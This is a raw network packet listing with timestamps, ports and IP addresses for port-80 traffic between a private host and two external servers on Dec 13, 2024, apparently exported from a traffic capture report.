Dec 13, 2024 18:53:31.190277100 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.190309048 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.190845013 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.190917015 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.190952063 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.190973043 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.191004038 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.191704035 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.191740036 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.191803932 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.191880941 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.192393064 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.192498922 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.192507029 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.192555904 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.192559004 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.193352938 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.193407059 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.193409920 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.193442106 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.193505049 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.193795919 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.193851948 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.193916082 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.193950891 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.194008112 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.194597960 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.194653034 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.194715023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.194736958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.195264101 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.195318937 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.195486069 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.195538998 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.195647001 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.195682049 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.195735931 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.196223974 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.196353912 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.196389914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.196408987 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.196460962 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.196954966 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197089911 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197125912 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197144032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.197175980 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.197702885 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197843075 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197848082 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.197880030 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.197900057 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.197926998 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.198441982 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.198496103 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.198544979 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.198580980 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.198597908 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.198641062 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.199248075 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.199342966 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.199377060 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.199390888 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.199421883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200037956 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200088024 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200123072 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200158119 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200176954 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200203896 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200680017 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200726986 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200789928 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200824022 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.200841904 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.200866938 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.201400995 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.201456070 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.201522112 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.201556921 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.201575041 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.201601982 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.202142954 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.202317953 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.202373981 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.221613884 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.221709013 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.221745014 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.221872091 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.221959114 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.221985102 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.222040892 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.222115993 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.222151041 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.222202063 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.222733021 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.224051952 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.370573044 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.370630980 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.370646000 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.370934010 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.371006966 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.371061087 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.371073961 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.371078014 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.371141911 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:34.218700886 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:34.220102072 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:34.339689016 CET	80	49859	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:34.339747906 CET	49859	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:34.340423107 CET	80	49876	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:34.340504885 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:34.353254080 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:34.473195076 CET	80	49876	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:35.697653055 CET	80	49876	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:35.698466063 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:35.701553106 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:35.701936007 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:35.821924925 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:35.821973085 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:35.822067976 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:35.822072983 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:35.822491884 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:35.942734957 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158556938 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158606052 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.158637047 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158649921 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158670902 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.158690929 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.158906937 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158946037 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158951998 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.158960104 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.158978939 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.158997059 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.159302950 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.159339905 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.159339905 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.159353018 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.159368992 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.159377098 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.159389019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.159405947 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.278448105 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.278537989 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.278563023 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.278608084 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.282607079 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.282672882 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.350889921 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.350979090 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.351062059 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.351103067 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.354847908 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.354918003 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.354918957 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.354968071 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.363496065 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.363555908 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.363663912 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.363709927 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.372375011 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.372446060 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.372461081 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.372514963 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.380379915 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.380434036 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.380461931 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.380496979 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.388673067 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.388765097 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.388819933 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.388870955 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.397048950 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.397124052 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.397126913 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.397186041 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.405522108 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.405589104 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.405641079 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.405689955 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.414139986 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.414212942 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.414212942 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.414313078 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.422456980 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.422529936 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.422599077 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.422650099 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.430238008 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.430311918 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.430365086 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.430414915 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.471824884 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.471911907 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.471916914 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.471960068 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.542963028 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.543073893 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.543082952 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.543138027 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.545031071 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.545078039 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.545948029 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.546000957 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.546040058 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.546084881 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.550673962 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.550741911 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.550838947 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.550884008 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.555510044 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.555593014 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.555660963 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.555711985 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.560132027 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.560198069 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.560198069 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.560244083 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.564874887 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.564935923 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.564943075 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.564982891 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.569566011 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.569638014 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.569667101 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.569685936 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.574398041 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.574459076 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.574516058 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.574557066 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.578879118 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.578948975 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.579010010 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.579055071 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.583659887 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.583739042 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.583775043 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.583817959 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.588304996 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.588371992 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.588429928 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.588476896 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.593112946 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.593173981 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.593175888 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.593228102 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.597662926 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.597717047 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.597800016 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.597847939 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.602370977 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.602413893 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.602454901 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.602498055 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.606103897 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.606154919 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.606157064 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.606213093 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.609957933 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.610018969 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.610094070 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.610146046 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.613554955 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.613603115 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.613863945 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.613914013 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.617582083 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.617634058 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.617702961 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.617750883 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.620863914 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.620913029 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.620928049 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.620975018 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.624479055 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.624530077 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.624597073 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.624650955 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.628187895 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.628243923 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.628282070 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.628326893 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.631822109 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.631866932 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.631963015 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.632003069 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.662969112 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.663019896 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.663100958 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.663141012 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.664854050 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.664902925 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.737273932 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.737292051 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.737339020 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.737365961 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.738575935 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.738624096 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.738766909 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.738812923 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.741532087 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.741589069 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.742546082 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.742594004 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.742881060 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.742935896 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.745384932 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.745440960 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.745445967 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.745491982 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.748157978 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.748207092 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.748253107 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.748307943 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.750809908 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.750875950 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.750910044 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.750957966 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.753441095 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.753504992 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.753523111 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.753565073 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.756046057 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.756108046 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.756165981 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.756208897 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.758549929 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.758603096 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.758646965 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.758687019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.761039972 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.761096954 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.761149883 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.761195898 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.763530970 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.763587952 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:37.763675928 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:37.763740063 CET	49877	80	192.168.2.7	31.41.244.11
